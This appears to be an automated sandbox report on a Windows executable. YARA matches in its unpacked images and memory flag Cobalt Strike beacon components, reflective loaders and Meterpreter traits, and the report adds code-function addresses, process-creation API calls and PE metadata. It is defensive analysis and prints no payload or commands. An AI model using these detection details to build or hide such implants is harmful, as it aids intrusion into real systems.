Source: cH0s914NeF.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: cH0s914NeF.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: cH0s914NeF.exe	String found in binary or memory: http://www.digicert.com/CPS0

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.cH0s914NeF.exe.3a60000.1.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.cH0s914NeF.exe.3a60000.1.unpack, type: UNPACKEDPE	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.cH0s914NeF.exe.3a60000.1.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 0.2.cH0s914NeF.exe.3a60000.1.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.cH0s914NeF.exe.3a60000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.cH0s914NeF.exe.3a60000.1.unpack, type: UNPACKEDPE	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.cH0s914NeF.exe.3a60000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.cH0s914NeF.exe.3a60000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.cH0s914NeF.exe.3a60000.1.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.cH0s914NeF.exe.3a60000.1.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.cH0s914NeF.exe.3a60000.1.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 0.2.cH0s914NeF.exe.3a60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.cH0s914NeF.exe.3a60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.cH0s914NeF.exe.3a60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 0.2.cH0s914NeF.exe.3a60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.cH0s914NeF.exe.3a60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.cH0s914NeF.exe.3a60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.cH0s914NeF.exe.3a60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.cH0s914NeF.exe.3a60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.cH0s914NeF.exe.3a60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.cH0s914NeF.exe.3a60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike payload Author: ditekSHen
Source: Process Memory Space: cH0s914NeF.exe PID: 4304, type: MEMORYSTR	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: Process Memory Space: cH0s914NeF.exe PID: 4304, type: MEMORYSTR	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: Process Memory Space: cH0s914NeF.exe PID: 4304, type: MEMORYSTR	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth

Source: C:\Users\user\Desktop\cH0s914NeF.exe

Code function: 0_2_03A70240 CreateProcessAsUserA,GetLastError,GetLastError,CreateProcessA,GetLastError,GetCurrentDirectoryW,GetCurrentDirectoryW,CreateProcessWithTokenW,GetLastError,GetLastError,GetLastError,GetLastError,

0_2_03A70240

Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_0043C100	0_2_0043C100
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_0040E1C0	0_2_0040E1C0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_004481C0	0_2_004481C0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00458180	0_2_00458180
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_004461A0	0_2_004461A0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00430220	0_2_00430220
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_004382D0	0_2_004382D0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_0043E2F0	0_2_0043E2F0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00412350	0_2_00412350
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00424470	0_2_00424470
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00416570	0_2_00416570
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_0045A520	0_2_0045A520
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_0044A650	0_2_0044A650
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_0042C670	0_2_0042C670
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00440600	0_2_00440600
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_004306D0	0_2_004306D0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00412730	0_2_00412730
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_0048A850	0_2_0048A850
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_0043AA50	0_2_0043AA50
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00438A60	0_2_00438A60
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00444AD0	0_2_00444AD0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_0042CAE0	0_2_0042CAE0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00448AA0	0_2_00448AA0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_0043EBA0	0_2_0043EBA0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_0043CC50	0_2_0043CC50
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00446CE0	0_2_00446CE0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_0044AF60	0_2_0044AF60
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00440F00	0_2_00440F00
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00418F30	0_2_00418F30
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00424FE0	0_2_00424FE0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00415001	0_2_00415001
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_0049D270	0_2_0049D270
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00457230	0_2_00457230
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00443380	0_2_00443380
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_004493B0	0_2_004493B0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_004594F0	0_2_004594F0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_0043F490	0_2_0043F490
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_0040F5A0	0_2_0040F5A0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_0043B5B0	0_2_0043B5B0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00487640	0_2_00487640
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00445660	0_2_00445660
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_0043D7C0	0_2_0043D7C0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_004417A0	0_2_004417A0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_004478B0	0_2_004478B0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_0041BA00	0_2_0041BA00
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_0040FA10	0_2_0040FA10
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00403A90	0_2_00403A90
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_0049BB29	0_2_0049BB29
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00411B20	0_2_00411B20
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00449CF0	0_2_00449CF0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_0043FD40	0_2_0043FD40
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00487DB0	0_2_00487DB0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00423EC0	0_2_00423EC0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00439F00	0_2_00439F00
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_00443F10	0_2_00443F10
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A803DC	0_2_03A803DC
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A843D4	0_2_03A843D4
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A6A280	0_2_03A6A280
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A8A270	0_2_03A8A270
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A70240	0_2_03A70240
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A761C0	0_2_03A761C0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A7E0E8	0_2_03A7E0E8
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A7EEB4	0_2_03A7EEB4
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A80E90	0_2_03A80E90
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A8AE57	0_2_03A8AE57
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A76CB0	0_2_03A76CB0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A8B140	0_2_03A8B140
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A8D0C0	0_2_03A8D0C0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A6D784	0_2_03A6D784
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A89570	0_2_03A89570
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A8BAB0	0_2_03A8BAB0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A7FD18	0_2_03A7FD18
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A69D6C	0_2_03A69D6C
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_036802D7	0_2_036802D7
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_0367F15F	0_2_0367F15F
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_0367D52F	0_2_0367D52F
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_0366CBCB	0_2_0366CBCB
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_0367F823	0_2_0367F823

Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: String function: 0040D640 appears 123 times
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: String function: 004A0DD0 appears 53 times
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: String function: 0048BC60 appears 130 times
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: String function: 0049AA80 appears 62 times
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: String function: 004A0FF0 appears 102 times
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: String function: 0049A7C0 appears 38 times
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: String function: 0049B020 appears 144 times

Source: cH0s914NeF.exe

Static PE information: invalid certificate

Source: cH0s914NeF.exe

Static PE information: Number of sections : 17 > 10

Source: 0.2.cH0s914NeF.exe.3a60000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.cH0s914NeF.exe.3a60000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.cH0s914NeF.exe.3a60000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 0.2.cH0s914NeF.exe.3a60000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.cH0s914NeF.exe.3a60000.1.unpack, type: UNPACKEDPE	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.cH0s914NeF.exe.3a60000.1.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.cH0s914NeF.exe.3a60000.1.unpack, type: UNPACKEDPE	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.cH0s914NeF.exe.3a60000.1.unpack, type: UNPACKEDPE	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 0.2.cH0s914NeF.exe.3a60000.1.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.cH0s914NeF.exe.3a60000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.cH0s914NeF.exe.3a60000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 0.2.cH0s914NeF.exe.3a60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.cH0s914NeF.exe.3a60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.cH0s914NeF.exe.3a60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 0.2.cH0s914NeF.exe.3a60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.cH0s914NeF.exe.3a60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.cH0s914NeF.exe.3a60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.cH0s914NeF.exe.3a60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.cH0s914NeF.exe.3a60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 0.2.cH0s914NeF.exe.3a60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.cH0s914NeF.exe.3a60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
